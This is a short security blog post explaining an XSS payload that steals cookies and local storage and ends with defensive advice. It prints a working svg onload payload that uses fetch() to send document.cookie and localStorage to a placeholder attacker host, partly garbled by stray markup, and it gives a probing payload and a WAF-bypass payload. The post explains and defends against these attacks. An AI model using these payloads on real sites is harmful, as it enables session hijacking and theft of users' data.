XSS Payload That Steals Both Cookies and Local Storage Data
Cross-Site Scripting (XSS) attacks continue to pose a significant threat to web applications. Today, we’ll examine a particularly dangerous payload that can siphon both cookies and local storage data from unsuspecting users.
The Payload
1
<svg/onload='const url = `https://weburl/collect?cookie=<span class="math-inline">\{encodeURIComponent\(document\.cookie\)\}&localStorage\=</span>{encodeURIComponent(JSON.stringify(localStorage))}`; fetch(url);'>
This payload, when injected into a vulnerable web page, executes the following actions:
- Creates an SVG element: The
svg
tag initiates an SVG image element. - Triggers JavaScript code on load: The
onload
attribute ensures the code within the single quotes runs when the SVG element loads. - Constructs a malicious URL: The code pieces together a URL containing:
- The attacker’s server address
https://weburl/collect
- The victim’s cookies, encoded for safe transmission
encodeURIComponent(document.cookie)
- The victim’s local storage data, also encoded
encodeURIComponent(JSON.stringify(localStorage))
- The attacker’s server address
- Sends stolen data: The
fetch(url)
function transmits the constructed URL, along with its sensitive payload, to the attacker’s server.
Consequences of a Successful Attack
- Cookie theft: Attackers can hijack user sessions, impersonate victims, and gain unauthorized access to sensitive data.
- Local storage compromise: Attackers can steal personally identifiable information, website preferences, and potentially sensitive tokens or keys stored in local storage.
Additional XSS Tips
- Testing for vulnerabilities: Inject common payloads like
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
into vulnerable parameters (e.g., email fields) to check for XSS. - Bypassing WAFs: Attackers continuously devise techniques to circumvent web application firewalls (WAFs), such as the location concatenation payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">".
Protection Measures
- Input validation and sanitization: Rigorously validate and sanitize all user-provided input to prevent malicious code injection.
- Content Security Policy (CSP): Implement a robust CSP to restrict script execution from untrusted sources.
- Regular testing and patching: Conduct regular penetration testing to identify and address vulnerabilities, and promptly apply security patches.
- Secure coding practices: Adhere to secure coding best practices to minimize the risk of XSS vulnerabilities.
Stay vigilant and proactive in protecting your web applications from XSS attacks. Remember, prevention is far better than the cure.
This post is licensed under CC BY 4.0 by the author.